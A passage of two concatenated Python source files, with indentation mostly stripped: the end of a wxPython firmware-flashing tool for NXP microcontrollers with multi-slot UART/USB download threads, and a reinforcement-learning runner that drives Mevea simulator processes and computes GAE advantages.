isConnectionFailureOnce = True
continue
else:
return False
if self.connectStage[deviceIndex] == uidef.kConnectStage_Rom:
self.connectToDevice(self.connectStage[deviceIndex], deviceIndex)
if self._retryToPingBootloader(kBootloaderType_Rom, deviceIndex):
if (self.mcuSeries == uidef.kMcuSeries_iMXRT10yy) or \
(self.mcuSeries == uidef.kMcuSeries_iMXRT11yy):
self.getMcuDeviceHabStatus(deviceIndex)
if self.jumpToFlashloader(deviceIndex):
self.connectStage[deviceIndex] = uidef.kConnectStage_Flashloader
usbIdList = self.getUsbid()
self.setPortSetupValue(deviceIndex, self.connectStage[deviceIndex], usbIdList, True )
else:
self.updateConnectStatus('red')
self.setInfoStatus(uilang.kMsgLanguageContentDict['connectError_failToJumpToFl'][self.languageIndex])
return False
elif (self.mcuSeries == uidef.kMcuSeries_iMXRTxxx) or \
(self.mcuSeries == uidef.kMcuSeries_LPC) or \
(self.mcuSeries == uidef.kMcuSeries_Kinetis):
self.updateConnectStatus('green')
self.connectStage[deviceIndex] = uidef.kConnectStage_Ready
else:
pass
else:
self.updateConnectStatus('red')
self._doubleCheckBootModeError()
return False
elif self.connectStage[deviceIndex] == uidef.kConnectStage_Flashloader:
self.connectToDevice(self.connectStage[deviceIndex], deviceIndex)
if self._retryToPingBootloader(kBootloaderType_Flashloader, deviceIndex):
self.updateConnectStatus('green')
self.connectStage[deviceIndex] = uidef.kConnectStage_Ready
else:
self.setInfoStatus(uilang.kMsgLanguageContentDict['connectError_failToPingFl'][self.languageIndex])
self._connectFailureHandler(deviceIndex)
return False
elif self.connectStage[deviceIndex] == uidef.kConnectStage_Ready:
if connectSteps == 1:
self.setInfoStatus(uilang.kMsgLanguageContentDict['connectInfo_readyForDownload'][self.languageIndex])
return True
else:
if self._retryToPingBootloader(kBootloaderType_Flashloader, deviceIndex):
self.setInfoStatus(uilang.kMsgLanguageContentDict['connectInfo_readyForDownload'][self.languageIndex])
return True
else:
self.connectStage[deviceIndex] = uidef.kConnectStage_Rom
connectSteps += 1
else:
pass
connectSteps -= 1
def _updateDownloadOperationResults( self ):
autoDownloadResult_success = None
success = 0
autoDownloadResult_total = None
total = 0
if self.isUartPortSelected:
autoDownloadResult_success = g_uartAutoDownloadResult_success
autoDownloadResult_total = g_uartAutoDownloadResult_total
elif self.isUsbhidPortSelected:
autoDownloadResult_success = g_usbAutoDownloadResult_success
autoDownloadResult_total = g_usbAutoDownloadResult_total
else:
pass
for i in range(uidef.kMaxMfgBoards):
success = success + autoDownloadResult_success[i]
total = total + autoDownloadResult_total[i]
self.setDownloadOperationResults(total, success)
def _doUartxAllInOneAction( self, deviceIndex=0 ):
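        # Worker loop for one UART slot: poll the pending flag once a second; when it is set, run
        # the all-in-one download for this slot and clear the flag. Slots other than 0 re-arm
        # themselves automatically as long as a COM port is assigned to them.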
while True:
if self.isUartAllInOneActionTaskPending[deviceIndex]:
self._doUartAllInOneAction(deviceIndex)
self.isUartAllInOneActionTaskPending[deviceIndex] = False
if (deviceIndex == 0):
self._stopGaugeTimer()
else:
if (deviceIndex != 0):
try:
if self.uartComPort[deviceIndex] != None:
self.writeDebugLog("Entering task_doUartxAllInOneAction(), Set Pending flag " + str(deviceIndex) + ", uart path is " + self.uartComPort[deviceIndex])
self.isUartAllInOneActionTaskPending[deviceIndex] = True
global g_uartAutoDownloadResult_success
global g_uartAutoDownloadResult_total
self.updateSlotStatus(deviceIndex, 'green', g_uartAutoDownloadResult_success[deviceIndex], g_uartAutoDownloadResult_total[deviceIndex])
else:
pass
except:
pass
time.sleep(1)
def task_doUart0AllInOneAction( self ):
self._doUartxAllInOneAction(0)
def task_doUart1AllInOneAction( self ):
self._doUartxAllInOneAction(1)
def task_doUart2AllInOneAction( self ):
self._doUartxAllInOneAction(2)
def task_doUart3AllInOneAction( self ):
self._doUartxAllInOneAction(3)
def task_doUart4AllInOneAction( self ):
self._doUartxAllInOneAction(4)
def task_doUart5AllInOneAction( self ):
self._doUartxAllInOneAction(5)
def task_doUart6AllInOneAction( self ):
self._doUartxAllInOneAction(6)
def task_doUart7AllInOneAction( self ):
self._doUartxAllInOneAction(7)
def _doUartAllInOneAction( self, deviceIndex=0 ):
global g_uartAutoDownloadResult_success
global g_uartAutoDownloadResult_total
if len(self.sbAppFiles) == 0:
self.updateConnectStatus('red')
self.setInfoStatus(uilang.kMsgLanguageContentDict['downloadError_notValidImage'][self.languageIndex])
return
successes = 0
g_uartAutoDownloadResult_total[deviceIndex] += 1
if self._connectStateMachine(deviceIndex):
for i in range(len(self.sbAppFiles)):
if self.flashSbImage(self.sbAppFiles[i], deviceIndex):
if i == len(self.sbAppFiles) - 1:
successes = 1
g_uartAutoDownloadResult_success[deviceIndex] += 1
self.updateSlotStatus(deviceIndex, 'blue', g_uartAutoDownloadResult_success[deviceIndex], g_uartAutoDownloadResult_total[deviceIndex])
self.updateConnectStatus('blue')
self.setInfoStatus(uilang.kMsgLanguageContentDict['downloadInfo_success'][self.languageIndex])
else:
self.updateConnectStatus('red')
self.writeInfoLog("Slot " + str(deviceIndex) + " failure:" + str(g_uartAutoDownloadResult_total[deviceIndex]))
self.updateSlotStatus(deviceIndex, 'red', g_uartAutoDownloadResult_success[deviceIndex], g_uartAutoDownloadResult_total[deviceIndex])
break
self.resetMcuDevice(deviceIndex)
time.sleep(2)
else:
self.writeInfoLog("Slot " + str(deviceIndex) + " failure: " + str(g_uartAutoDownloadResult_total[deviceIndex]))
self.updateSlotStatus(deviceIndex, 'red', g_uartAutoDownloadResult_success[deviceIndex], g_uartAutoDownloadResult_total[deviceIndex])
self.connectStage[deviceIndex] = uidef.kConnectStage_Rom
self._setUartUsbPort(deviceIndex)
self.updateConnectStatus('black')
self.setDownloadOperationResults(1, successes)
        # Set the slot button back to gray
time.sleep(0.5)
self.updateSlotStatus(deviceIndex, 'gray', g_uartAutoDownloadResult_success[deviceIndex], g_uartAutoDownloadResult_total[deviceIndex])
def _doUsbxAllInOneAction( self, deviceIndex=0 ):
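        # Worker loop for one USB slot, same pattern as the UART worker; a slot re-arms itself
        # whenever a ROM device path is assigned to it (slot 0 only does this when dynamic USB
        # detection is enabled).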
while True:
if self.isUsbAllInOneActionTaskPending[deviceIndex]:
self._doUsbAutoAllInOneAction(deviceIndex)
self.isUsbAllInOneActionTaskPending[deviceIndex] = False
if (deviceIndex == 0) and (not self.isDymaticUsbDetection):
self._stopGaugeTimer()
else:
if ((deviceIndex == 0) and self.isDymaticUsbDetection) or \
(deviceIndex != 0):
try:
if self.usbDevicePath[deviceIndex]['rom'] != None:
self.writeDebugLog("Entering task_doUsbxAllInOneAction(), Set Pending flag " + str(deviceIndex) + ", usb path is " + self.usbDevicePath[deviceIndex]['rom'])
self.isUsbAllInOneActionTaskPending[deviceIndex] = True
global g_usbAutoDownloadResult_success
global g_usbAutoDownloadResult_total
self.updateSlotStatus(deviceIndex, 'green', g_usbAutoDownloadResult_success[deviceIndex], g_usbAutoDownloadResult_total[deviceIndex])
else:
pass
except:
pass
time.sleep(1)
def task_doUsb0AllInOneAction( self ):
self._doUsbxAllInOneAction(0)
def task_doUsb1AllInOneAction( self ):
self._doUsbxAllInOneAction(1)
def task_doUsb2AllInOneAction( self ):
self._doUsbxAllInOneAction(2)
def task_doUsb3AllInOneAction( self ):
self._doUsbxAllInOneAction(3)
def task_doUsb4AllInOneAction( self ):
self._doUsbxAllInOneAction(4)
def task_doUsb5AllInOneAction( self ):
self._doUsbxAllInOneAction(5)
def task_doUsb6AllInOneAction( self ):
self._doUsbxAllInOneAction(6)
def task_doUsb7AllInOneAction( self ):
self._doUsbxAllInOneAction(7)
def _doUsbAutoAllInOneAction( self, deviceIndex=0 ):
global g_usbAutoDownloadResult_success
global g_usbAutoDownloadResult_total
if len(self.sbAppFiles) == 0:
self.updateConnectStatus('red')
if not self.isDymaticUsbDetection:
self.setInfoStatus(uilang.kMsgLanguageContentDict['downloadError_notValidImage'][self.languageIndex])
return
successes = 0
g_usbAutoDownloadResult_total[deviceIndex] += 1
if self._connectStateMachine(deviceIndex):
for i in range(len(self.sbAppFiles)):
if self.flashSbImage(self.sbAppFiles[i], deviceIndex):
if i == len(self.sbAppFiles) - 1:
successes = 1
g_usbAutoDownloadResult_success[deviceIndex] += 1
self.updateSlotStatus(deviceIndex, 'blue', g_usbAutoDownloadResult_success[deviceIndex], g_usbAutoDownloadResult_total[deviceIndex])
self.updateConnectStatus('blue')
if not self.isDymaticUsbDetection:
self.setInfoStatus(uilang.kMsgLanguageContentDict['downloadInfo_success'][self.languageIndex])
else:
self.updateConnectStatus('red')
self.writeInfoLog("Slot " + str(deviceIndex) + " failure:" + str(g_usbAutoDownloadResult_total[deviceIndex]))
self.updateSlotStatus(deviceIndex, 'red', g_usbAutoDownloadResult_success[deviceIndex], g_usbAutoDownloadResult_total[deviceIndex])
break
if not self.isDymaticUsbDetection:
self.resetMcuDevice(deviceIndex)
time.sleep(2)
else:
self.waitForUsbhidDeviceDisconnect(deviceIndex)
else:
self.writeInfoLog("Slot " + str(deviceIndex) + " failure: " + str(g_usbAutoDownloadResult_total[deviceIndex]))
self.updateSlotStatus(deviceIndex, 'red', g_usbAutoDownloadResult_success[deviceIndex], g_usbAutoDownloadResult_total[deviceIndex])
self.connectStage[deviceIndex] = uidef.kConnectStage_Rom
self._setUartUsbPort(deviceIndex)
self.isUsbhidConnected[deviceIndex] = False
if self.isDymaticUsbDetection:
self.usbDevicePath[deviceIndex]['rom'] = None
self._updateDownloadOperationResults()
            # Never clear 'flashloader' here; it is still needed to recognize the device when it is plugged in again
#self.usbDevicePath[deviceIndex]['flashloader'] = None
else:
self.updateConnectStatus('black')
self.setDownloadOperationResults(1, successes)
self.initUsbDevicePath()
        # Set the slot button back to gray
time.sleep(0.5)
self.updateSlotStatus(deviceIndex, 'gray', g_usbAutoDownloadResult_success[deviceIndex], g_usbAutoDownloadResult_total[deviceIndex])
def callbackAllInOneAction( self, event ):
if self.isUartPortSelected:
self.isUartAllInOneActionTaskPending[0] = True
self._startGaugeTimer()
elif self.isUsbhidPortSelected and (not self.isDymaticUsbDetection):
self.isUsbAllInOneActionTaskPending[0] = True
self._startGaugeTimer()
else:
pass
def _resetAllSlots( self ):
if self.isUartPortSelected:
autoDownloadResult_success = g_uartAutoDownloadResult_success
autoDownloadResult_total = g_uartAutoDownloadResult_total
elif self.isUsbhidPortSelected:
autoDownloadResult_success = g_usbAutoDownloadResult_success
autoDownloadResult_total = g_usbAutoDownloadResult_total
else:
pass
for i in range(uidef.kMaxMfgBoards):
autoDownloadResult_success[i] = 0
autoDownloadResult_total[i] = 0
self.updateSlotStatus(i, 'gray', autoDownloadResult_success[i], autoDownloadResult_total[i])
def _triggerAllUsbDevicesOnce( self ):
if self.isUsbhidPortSelected and self.isDymaticUsbDetection:
for i in range(uidef.kMaxMfgBoards):
if self.usbDevicePath[i]['rom'] != None:
self.isUsbAllInOneActionTaskPending[i] = True
else:
pass
else:
pass
def callbackChangedAppFile( self, event ):
self.getUserAppFilePath()
self.setCostTime(0)
self.setDownloadOperationResults(0)
self.updateConnectStatus('black')
self._resetAllSlots()
#self._triggerAllUsbDevicesOnce()
def callbackChangedAppFolder( self, event ):
self.getUserAppFilePath()
if os.path.isfile(self.sbAppFilePath):
self.resetUserAppFolderPath()
self.setInfoStatus(uilang.kMsgLanguageContentDict['downloadError_clearImageFileFirst'][self.languageIndex])
else:
self.getUserAppFolderPath()
self.setCostTime(0)
self.setDownloadOperationResults(0)
self.updateConnectStatus('black')
self._resetAllSlots()
#self._triggerAllUsbDevicesOnce()
def _stopTask( self, thread ):
_async_raise(thread.ident, SystemExit)
def _deinitToolToExit( self ):
self._stopTask(g_task_detectUsbhid)
self._stopTask(g_task_uartAllInOneAction[0])
self._stopTask(g_task_usbAllInOneAction[0])
self._stopTask(g_task_increaseGauge)
global g_main_win
g_main_win.Show(False)
try:
self.Destroy()
except:
pass
self.closeInfoLog()
self.closeDebugLog()
def callbackExit( self, event ):
self._deinitToolToExit()
def callbackClose( self, event ):
self._deinitToolToExit()
def callbackSetUsbDetectionAsDynamic( self, event ):
self.setUsbDetection()
def callbackSetUsbDetectionAsStatic( self, event ):
self.setUsbDetection()
def callbackSetLanguageAsEnglish( self, event ):
self.setLanguage()
def callbackSetLanguageAsChinese( self, event ):
self.setLanguage()
def callbackShowHomePage( self, event ):
msgText = ((uilang.kMsgLanguageContentDict['homePage_info'][self.languageIndex]))
wx.MessageBox(msgText, uilang.kMsgLanguageContentDict['homePage_title'][self.languageIndex], wx.OK | wx.ICON_INFORMATION)
def callbackShowAboutAuthor( self, event ):
msgText = ((uilang.kMsgLanguageContentDict['aboutAuthor_author'][self.languageIndex]) +
(uilang.kMsgLanguageContentDict['aboutAuthor_email1'][self.languageIndex]) +
(uilang.kMsgLanguageContentDict['aboutAuthor_email2'][self.languageIndex]) +
(uilang.kMsgLanguageContentDict['aboutAuthor_blog'][self.languageIndex]))
wx.MessageBox(msgText, uilang.kMsgLanguageContentDict['aboutAuthor_title'][self.languageIndex], wx.OK | wx.ICON_INFORMATION)
def callbackShowRevisionHistory( self, event ):
msgText = ((uilang.kMsgLanguageContentDict['revisionHistory_v1_0_0'][self.languageIndex]) +
(uilang.kMsgLanguageContentDict['revisionHistory_v2_0_0'][self.languageIndex]) +
(uilang.kMsgLanguageContentDict['revisionHistory_v3_0_0'][self.languageIndex]) +
(uilang.kMsgLanguageContentDict['revisionHistory_v3_1_0'][self.languageIndex]) +
(uilang.kMsgLanguageContentDict['revisionHistory_v3_2_0'][self.languageIndex]))
wx.MessageBox(msgText, uilang.kMsgLanguageContentDict['revisionHistory_title'][self.languageIndex], wx.OK | wx.ICON_INFORMATION)
if __name__ == '__main__':
app = wx.App()
g_main_win = flashMain(None)
g_main_win.SetTitle(u"NXP MCU Boot Flasher v3.2.0")
g_main_win.Show()
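    # Spawn one daemon worker thread per UART slot and per USB slot (8 of each below), plus the
    # USB detection thread and the progress-gauge thread. The slot workers idle until their
    # pending flags are set (see callbackAllInOneAction above).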
g_task_detectUsbhid = threading.Thread(target=g_main_win.task_doDetectUsbhid)
g_task_detectUsbhid.setDaemon(True)
g_task_detectUsbhid.start()
g_task_uartAllInOneAction[0] = threading.Thread(target=g_main_win.task_doUart0AllInOneAction)
g_task_uartAllInOneAction[0].setDaemon(True)
g_task_uartAllInOneAction[0].start()
g_task_uartAllInOneAction[1] = threading.Thread(target=g_main_win.task_doUart1AllInOneAction)
g_task_uartAllInOneAction[1].setDaemon(True)
g_task_uartAllInOneAction[1].start()
g_task_uartAllInOneAction[2] = threading.Thread(target=g_main_win.task_doUart2AllInOneAction)
g_task_uartAllInOneAction[2].setDaemon(True)
g_task_uartAllInOneAction[2].start()
g_task_uartAllInOneAction[3] = threading.Thread(target=g_main_win.task_doUart3AllInOneAction)
g_task_uartAllInOneAction[3].setDaemon(True)
g_task_uartAllInOneAction[3].start()
g_task_uartAllInOneAction[4] = threading.Thread(target=g_main_win.task_doUart4AllInOneAction)
g_task_uartAllInOneAction[4].setDaemon(True)
g_task_uartAllInOneAction[4].start()
g_task_uartAllInOneAction[5] = threading.Thread(target=g_main_win.task_doUart5AllInOneAction)
g_task_uartAllInOneAction[5].setDaemon(True)
g_task_uartAllInOneAction[5].start()
g_task_uartAllInOneAction[6] = threading.Thread(target=g_main_win.task_doUart6AllInOneAction)
g_task_uartAllInOneAction[6].setDaemon(True)
g_task_uartAllInOneAction[6].start()
g_task_uartAllInOneAction[7] = threading.Thread(target=g_main_win.task_doUart7AllInOneAction)
g_task_uartAllInOneAction[7].setDaemon(True)
g_task_uartAllInOneAction[7].start()
g_task_usbAllInOneAction[0] = threading.Thread(target=g_main_win.task_doUsb0AllInOneAction)
g_task_usbAllInOneAction[0].setDaemon(True)
g_task_usbAllInOneAction[0].start()
g_task_usbAllInOneAction[1] = threading.Thread(target=g_main_win.task_doUsb1AllInOneAction)
g_task_usbAllInOneAction[1].setDaemon(True)
g_task_usbAllInOneAction[1].start()
g_task_usbAllInOneAction[2] = threading.Thread(target=g_main_win.task_doUsb2AllInOneAction)
g_task_usbAllInOneAction[2].setDaemon(True)
g_task_usbAllInOneAction[2].start()
g_task_usbAllInOneAction[3] = threading.Thread(target=g_main_win.task_doUsb3AllInOneAction)
g_task_usbAllInOneAction[3].setDaemon(True)
g_task_usbAllInOneAction[3].start()
g_task_usbAllInOneAction[4] = threading.Thread(target=g_main_win.task_doUsb4AllInOneAction)
g_task_usbAllInOneAction[4].setDaemon(True)
g_task_usbAllInOneAction[4].start()
g_task_usbAllInOneAction[5] = threading.Thread(target=g_main_win.task_doUsb5AllInOneAction)
g_task_usbAllInOneAction[5].setDaemon(True)
g_task_usbAllInOneAction[5].start()
g_task_usbAllInOneAction[6] = threading.Thread(target=g_main_win.task_doUsb6AllInOneAction)
g_task_usbAllInOneAction[6].setDaemon(True)
g_task_usbAllInOneAction[6].start()
g_task_usbAllInOneAction[7] = threading.Thread(target=g_main_win.task_doUsb7AllInOneAction)
g_task_usbAllInOneAction[7].setDaemon(True)
g_task_usbAllInOneAction[7].start()
g_task_increaseGauge = threading.Thread(target=g_main_win.task_doIncreaseGauge)
g_task_increaseGauge.setDaemon(True)
g_task_increaseGauge.start()
app.MainLoop()
|
mevea_runner.py
|
import numpy as np
import gym, pyautogui, cv2, os, shutil
import os.path as osp
from common.runners import AbstractEnvRunner, swap_and_flatten
from common.solver_utils import get_solver_path, start_solver, stop_solver
from common.server_utils import is_backend_registered, delete_id
from time import sleep, time
from threading import Thread
class MeveaRunner(AbstractEnvRunner):
def __init__(self, *, env, model, n_steps, gamma, lam, debug=False):
"""
A runner to learn the policy of an environment for a model
:param env: (Gym environment) The environment to learn from
:param model: (Model) The model to learn
:param n_steps: (int) The number of steps to run for each environment
:param gamma: (float) Discount factor
:param lam: (float) Factor for trade-off of bias vs variance for Generalized Advantage Estimator
"""
super().__init__(env=env, model=model, n_steps=n_steps)
self.lam = lam
self.gamma = gamma
self.solver_path = get_solver_path()
self.mvs = env.mvs
self.dir = env.dir
self.server = env.server
self.recording = False
self.debug = debug
self.is_solver_starting = False
# copy model to different directories to deal with data.tmp bug
if len(self.mvs) == 1:
self.model_dirs = self.mvs
else:
self.model_dirs = []
for i, mvs in enumerate(self.mvs):
basename = []
for j in range(3):
basename.append(osp.basename(mvs))
mvs = osp.dirname(mvs)
env_i_dir = osp.join(self.dir[i], str(i))
if not osp.isdir(env_i_dir):
shutil.copytree(mvs, env_i_dir)
self.model_dirs.append(osp.abspath(osp.join(env_i_dir, *basename[::-1])))
# reset environments in debug mode
if self.debug:
inp = input('id:\n')
self.backend_ids = [int(item) for item in inp.split(',')]
# init data
self.mb_obs = [[] for _ in range(self.n_envs)]
self.mb_actions = [[] for _ in range(self.n_envs)]
self.mb_values = [[] for _ in range(self.n_envs)]
self.mb_neglogpacs = [[] for _ in range(self.n_envs)]
self.mb_dones = [[] for _ in range(self.n_envs)]
self.mb_rewards = [[] for _ in range(self.n_envs)]
self.scores = [[] for _ in range(self.n_envs)]
def _start(self, headless=False, sleep_interval=1):
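        # Launch one Mevea solver process per model copy and block until each backend has
        # registered itself with its server; the registration time is kept for debug output.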
self.backend_procs = []
self.start_times = []
self.is_solver_starting = True
for mvs, server in zip(self.model_dirs, self.server):
proc = start_solver(self.solver_path, mvs, headless=headless)
self.backend_procs.append(proc)
while not is_backend_registered(server, proc.pid):
sleep(sleep_interval)
self.start_times.append(time())
self.is_solver_starting = False
def record(self, video_file, sleep_interval=0.25, x=210, y=90, width=755, height=400):
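        # Screen-capture loop: grab the given screen region with pyautogui and append the frames
        # to an MP4 file until self.recording is cleared by the caller.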
screen_size = pyautogui.Size(width, height)
fourcc = cv2.VideoWriter_fourcc(*"MP4V")
out = cv2.VideoWriter(video_file, fourcc, 20.0, (screen_size))
while self.recording:
img = pyautogui.screenshot(region=(x, y, width, height))
frame = np.array(img)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
out.write(frame)
sleep(sleep_interval)
cv2.destroyAllWindows()
out.release()
def _stop(self):
for proc, server in zip(self.backend_procs, self.server):
stop_solver(proc)
delete_id(server, proc.pid)
def _run_all(self, video_file=None, headless=True):
"""
Run a learning step of the model
:return:
- observations: (np.ndarray) the observations
- rewards: (np.ndarray) the rewards
- masks: (numpy bool) whether an episode is over or not
- actions: (np.ndarray) the actions
- values: (np.ndarray) the value function output
- negative log probabilities: (np.ndarray)
- states: (np.ndarray) the internal states of the recurrent policies
- infos: (dict) the extra information of the model
"""
# mb stands for minibatch
# start environment right here
self._start(headless=headless)
self.env.set_attr('id', [proc.pid for proc in self.backend_procs])
#self.obs[:] = self.env.reset()
if video_file is not None:
self.recording = True
thr = Thread(target=self.record, args=(video_file,), daemon=True)
thr.start()
mb_obs, mb_rewards, mb_actions, mb_values, mb_dones, mb_neglogpacs = [], [], [], [], [], []
mb_states = self.states
ep_infos = []
scores = [[] for _ in range(self.n_envs)]
scores_1 = [[] for _ in range(self.n_envs)]
scores_2 = [[] for _ in range(self.n_envs)]
scores_3 = [[] for _ in range(self.n_envs)]
tstep = 0
for _ in range(self.n_steps):
tstart = time()
actions, values, self.states, neglogpacs = self.model.step(self.obs, self.states, self.dones)
mb_obs.append(self.obs.copy())
mb_actions.append(actions)
mb_values.append(values)
mb_neglogpacs.append(neglogpacs)
mb_dones.append(self.dones)
clipped_actions = actions
# Clip the actions to avoid out of bound error
if isinstance(self.env.action_space, gym.spaces.Box):
clipped_actions = np.clip(actions, self.env.action_space.low, self.env.action_space.high)
self.obs[:], rewards, self.dones, infos = self.env.step(clipped_actions)
for ri, r in enumerate(rewards):
scores[ri].append(r)
for ri, inf in enumerate(infos):
scores_1[ri].append(infos[ri]['rc1'])
scores_2[ri].append(infos[ri]['rc2'])
scores_3[ri].append(infos[ri]['rc3'])
self.model.num_timesteps += self.n_envs
if self.callback is not None:
# Abort training early
self.callback.update_locals(locals())
if self.callback.on_step() is False:
self.continue_training = False
# Return dummy values
return [None] * 9
mb_rewards.append(rewards)
tstep += (time() - tstart)
print('Step time: {0}'.format(tstep / self.n_steps))
# stop recording
self.recording = False
# stop backends
self._stop()
# gather info
for escore, escore1, escore2, escore3 in zip(scores, scores_1, scores_2, scores_3):
maybe_ep_info = {'r': np.mean(escore), 'rc1': np.mean(escore1), 'rc2': np.mean(escore2), 'rc3': np.mean(escore3)}
if maybe_ep_info is not None:
ep_infos.append(maybe_ep_info)
# batch of steps to batch of rollouts
mb_obs = np.asarray(mb_obs, dtype=self.obs.dtype)
mb_rewards = np.asarray(mb_rewards, dtype=np.float32)
mb_actions = np.asarray(mb_actions)
mb_values = np.asarray(mb_values, dtype=np.float32)
mb_neglogpacs = np.asarray(mb_neglogpacs, dtype=np.float32)
        mb_dones = np.asarray(mb_dones, dtype=bool)
last_values = self.model.value(self.obs, self.states, self.dones)
# discount/bootstrap off value fn
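        # GAE(lambda): delta_t = r_t + gamma * V(s_{t+1}) * (1 - done_{t+1}) - V(s_t) and
        # A_t = delta_t + gamma * lam * (1 - done_{t+1}) * A_{t+1}, computed backwards over the
        # rollout; the returns used as value targets are then A_t + V(s_t).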
mb_advs = np.zeros_like(mb_rewards)
true_reward = np.copy(mb_rewards)
last_gae_lam = 0
for step in reversed(range(self.n_steps)):
if step == self.n_steps - 1:
nextnonterminal = 1.0 - self.dones
nextvalues = last_values
else:
nextnonterminal = 1.0 - mb_dones[step + 1]
nextvalues = mb_values[step + 1]
delta = mb_rewards[step] + self.gamma * nextvalues * nextnonterminal - mb_values[step]
mb_advs[step] = last_gae_lam = delta + self.gamma * self.lam * nextnonterminal * last_gae_lam
mb_returns = mb_advs + mb_values
mb_obs, mb_returns, mb_dones, mb_actions, mb_values, mb_neglogpacs, true_reward = \
map(swap_and_flatten, (mb_obs, mb_returns, mb_dones, mb_actions, mb_values, mb_neglogpacs, true_reward))
return mb_obs, mb_returns, mb_dones, mb_actions, mb_values, mb_neglogpacs, mb_states, ep_infos, true_reward
def _run_one(self, env_idx, headless, sleep_interval=1, delay_interval=2):
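        # Rollout worker for a single environment: steps its own solver for n_steps, appends the
        # transitions to the shared per-env buffers, and restarts the solver process whenever an
        # episode finishes (waiting for any other solver that is currently starting up).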
# sleep to prevent pressure bug
sleep(delay_interval)
# start timer
tstart = time()
# reset env
if self.debug:
            print(f'Resetting {env_idx}')
print(f'In {env_idx}, time between register and reset: {time() - self.start_times[env_idx]}')
self.obs[env_idx:env_idx+1] = self.env.reset_one(env_idx)
if self.debug:
print(f'Solver {env_idx} has been reset')
for _ in range(self.n_steps):
if self.debug:
print(_)
# step model
actions, values, self.states, neglogpacs = self.model.step(self.obs[env_idx:env_idx+1], self.states, self.dones[env_idx:env_idx+1])
# save results
self.mb_obs[env_idx].append(self.obs.copy()[env_idx])
self.mb_actions[env_idx].append(actions[0])
self.mb_values[env_idx].append(values[0])
self.mb_neglogpacs[env_idx].append(neglogpacs[0])
self.mb_dones[env_idx].append(self.dones[env_idx])
# Clip the actions to avoid out of bound error
clipped_actions = actions
if isinstance(self.env.action_space, gym.spaces.Box):
clipped_actions = np.clip(actions, self.env.action_space.low, self.env.action_space.high)
tnow = time()
self.obs[env_idx], rewards, self.dones[env_idx], infos = self.env.step_one(env_idx, clipped_actions)
# reset if done
if self.dones[env_idx]:
print(f'Env {env_idx} is done')
stop_solver(self.backend_procs[env_idx])
delete_id(self.server[env_idx], self.backend_procs[env_idx].pid)
while self.is_solver_starting:
sleep(sleep_interval)
self.is_solver_starting = True
proc = start_solver(self.solver_path, self.model_dirs[env_idx], headless=headless)
self.backend_procs[env_idx] = proc
while not is_backend_registered(self.server[env_idx], proc.pid):
sleep(sleep_interval)
self.start_times[env_idx] = time()
self.is_solver_starting = False
sleep(delay_interval)
self.env.set_attr('id', [proc.pid], indices=[env_idx])
if self.debug:
print(f'In {env_idx}, time between register and reset: {time() - self.start_times[env_idx]}')
self.obs[env_idx:env_idx + 1] = self.env.reset_one(env_idx)
if self.debug:
print('Env', env_idx, 'step takes', time() - tnow, 'seconds')
self.scores[env_idx].append([rewards, infos['rc1'], infos['rc2'], infos['rc3']])
self.model.num_timesteps += 1
if self.callback is not None:
# Abort training early
self.callback.update_locals(locals())
if self.callback.on_step() is False:
self.continue_training = False
# Return dummy values
return [None] * 9
self.mb_rewards[env_idx].append(rewards)
print(f'Step time in {self.backend_procs[env_idx].pid}: {(time() - tstart) / self.n_steps}')
stop_solver(self.backend_procs[env_idx])
delete_id(self.server[env_idx], self.backend_procs[env_idx].pid)
def _run(self, video_file=None, headless=False):
"""
Run a learning step of the model
:return:
- observations: (np.ndarray) the observations
- rewards: (np.ndarray) the rewards
- masks: (numpy bool) whether an episode is over or not
- actions: (np.ndarray) the actions
- values: (np.ndarray) the value function output
- negative log probabilities: (np.ndarray)
- states: (np.ndarray) the internal states of the recurrent policies
- infos: (dict) the extra information of the model
"""
# mb stands for minibatch
self.mb_obs = [[] for _ in range(self.n_envs)]
self.mb_actions = [[] for _ in range(self.n_envs)]
self.mb_values = [[] for _ in range(self.n_envs)]
self.mb_neglogpacs = [[] for _ in range(self.n_envs)]
self.mb_dones = [[] for _ in range(self.n_envs)]
self.mb_rewards = [[] for _ in range(self.n_envs)]
ep_infos = []
# start environment's backend
if self.debug:
self.env.set_attr('id', self.backend_ids)
else:
self._start(headless=headless)
self.env.set_attr('id', [proc.pid for proc in self.backend_procs])
# reset environment's frontend
#self.obs[:] = self.env.reset()
# start video recording
if video_file is not None:
self.recording = True
thr = Thread(target=self.record, args=(video_file,), daemon=True)
thr.start()
# run steps in different threads
threads = []
for env_idx in range(self.n_envs):
th = Thread(target=self._run_one, args=(env_idx, headless))
th.start()
threads.append(th)
for th in threads:
th.join()
# stop recording
self.recording = False
# combine data gathered into batches
mb_obs = [np.vstack([self.mb_obs[idx][step] for idx in range(self.n_envs)]) for step in range(self.n_steps)]
mb_rewards = [np.hstack([self.mb_rewards[idx][step] for idx in range(self.n_envs)]) for step in range(self.n_steps)]
mb_actions = [np.vstack([self.mb_actions[idx][step] for idx in range(self.n_envs)]) for step in range(self.n_steps)]
mb_values = [np.hstack([self.mb_values[idx][step] for idx in range(self.n_envs)]) for step in range(self.n_steps)]
mb_neglogpacs = [np.hstack([self.mb_neglogpacs[idx][step] for idx in range(self.n_envs)]) for step in range(self.n_steps)]
mb_dones = [np.hstack([self.mb_dones[idx][step] for idx in range(self.n_envs)]) for step in range(self.n_steps)]
mb_scores = [np.vstack([self.scores[idx][step] for idx in range(self.n_envs)]) for step in range(self.n_steps)]
mb_states = self.states
self.dones = np.array(self.dones)
infos = np.mean(np.array(mb_scores), axis=0)
for info in infos:
maybe_ep_info = {
'r': info[0],
'rc1': info[1],
'rc2': info[2],
'rc3': info[3]
}
ep_infos.append(maybe_ep_info)
# batch of steps to batch of rollouts
mb_obs = np.asarray(mb_obs, dtype=self.obs.dtype)
mb_rewards = np.asarray(mb_rewards, dtype=np.float32)
mb_actions = np.asarray(mb_actions)
mb_values = np.asarray(mb_values, dtype=np.float32)
mb_neglogpacs = np.asarray(mb_neglogpacs, dtype=np.float32)
        mb_dones = np.asarray(mb_dones, dtype=bool)
last_values = self.model.value(self.obs, self.states, self.dones)
# discount/bootstrap off value fn
mb_advs = np.zeros_like(mb_rewards)
true_reward = np.copy(mb_rewards)
last_gae_lam = 0
for step in reversed(range(self.n_steps)):
if step == self.n_steps - 1:
nextnonterminal = 1.0 - self.dones
nextvalues = last_values
else:
nextnonterminal = 1.0 - mb_dones[step + 1]
nextvalues = mb_values[step + 1]
delta = mb_rewards[step] + self.gamma * nextvalues * nextnonterminal - mb_values[step]
mb_advs[step] = last_gae_lam = delta + self.gamma * self.lam * nextnonterminal * last_gae_lam
mb_returns = mb_advs + mb_values
